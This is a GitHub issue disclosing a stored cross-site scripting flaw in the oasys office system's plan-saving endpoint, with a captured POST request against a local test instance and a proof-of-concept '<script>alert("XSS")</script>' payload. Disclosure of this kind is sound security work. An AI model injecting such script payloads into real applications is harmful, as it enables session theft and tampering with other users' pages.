oasys icon indicating copy to clipboard operation
oasys copied to clipboard

There is a stored xss vulnerability exists in oasys

Open Vulnerability110 opened this issue 4 years ago • 0 comments

Cross SIte Scripting (XSS) vulnerability exists in oasys By accessing the new plan function of plan management in the work plan on the background page, insert the < script > alert ("XSS") < / script > code. After adding successfully, an XSS window will pop up. [Vulnerability Type] Cross Site Scripting (XSS)

[Vendor of Product] https://github.com/misstt123/oasys/ [Affected Component] POST /plansave HTTP/1.1 Host: 127.0.0.1:8088 Content-Length: 1339 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:8088 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx0dNLzTW28gy2gUs User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://127.0.0.1:8088/planedit?pid=-1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628653260; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629356854,1629356969; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629787797; UM_distinctid=17b76ec38b042b-043bd40aca20f-3373266-e1000-17b76ec38b13f6; CNZZDATA1255091723=1621369374-1629783007-http%253A%252F%252F127.0.0.1%253A8080%252F%7C1629783007; JSESSIONID=75FF25138F3220CD88AC86C25A783344 Connection: close

------WebKitFormBoundaryx0dNLzTW28gy2gUs Content-Disposition: form-data; name="type"

日计划 ------WebKitFormBoundaryx0dNLzTW28gy2gUs Content-Disposition: form-data; name="status"

未完成 ------WebKitFormBoundaryx0dNLzTW28gy2gUs Content-Disposition: form-data; name="startTime"

2021-12-31 13:56:46 ------WebKitFormBoundaryx0dNLzTW28gy2gUs Content-Disposition: form-data; name="endTime"

2021-12-32 13:56:46 ------WebKitFormBoundaryx0dNLzTW28gy2gUs Content-Disposition: form-data; name="title"

三十多岁多

------WebKitFormBoundaryx0dNLzTW28gy2gUs Content-Disposition: form-data; name="label"

------WebKitFormBoundaryx0dNLzTW28gy2gUs Content-Disposition: form-data; name="planContent"

的水电费水电费第三方第三方第三方双方都胜多负少的水电费的是非得失 ------WebKitFormBoundaryx0dNLzTW28gy2gUs Content-Disposition: form-data; name="planSummary"

丰富高考中成功不存在向工程师水泥厂的世界观生产技术部从 测试的财务处我吃完 ------WebKitFormBoundaryx0dNLzTW28gy2gUs Content-Disposition: form-data; name="file"; filename="" Content-Type: application/octet-stream

------WebKitFormBoundaryx0dNLzTW28gy2gUs Content-Disposition: form-data; name="pid"

-1 ------WebKitFormBoundaryx0dNLzTW28gy2gUs--

[Attack Type] Remote

[Impact Code execution] true poc: < script > alert ("XSS") < / script > image image

Vulnerability110 avatar Dec 31 '21 06:12 Vulnerability110